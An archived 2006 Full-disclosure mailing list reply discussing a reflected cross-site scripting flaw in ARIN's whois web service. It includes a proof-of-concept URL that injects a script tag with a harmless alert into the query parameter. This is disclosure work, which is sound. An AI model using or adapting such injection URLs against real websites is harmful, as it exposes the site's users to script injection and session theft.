[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-disclosure] Arin.net XSS

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: RE: [Full-disclosure] Arin.net XSS
From: "php0t" <very@xxxxxxxxxxxxx>
Date: Fri, 3 Mar 2006 22:29:10 +0100

  Yes, because firefox probably doesn't execute javascript if the
location is in an IMG tag.
I don't know why they posted that in the first place.

Here's a link that will probably work under both browsers

http://ws.arin.net/whois/?queryinput=%3Cscript%3Ealert('666')%3C/script%
3E

> Right,
>    Did this ever work? This fails for me man. How did you verify it?


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Arin.net XSS
  - From: Michael Holstein

References:
- Re: [Full-disclosure] Arin.net XSS
  - From: Simon Smith

Prev by Date: Re: [Full-disclosure] Arin.net XSS
Next by Date: Re: [Full-disclosure] Arin.net XSS
Previous by thread: [Full-disclosure] Re: Arin.net XSS
Next by thread: Re: [Full-disclosure] Arin.net XSS
Index(es):
- Date
- Thread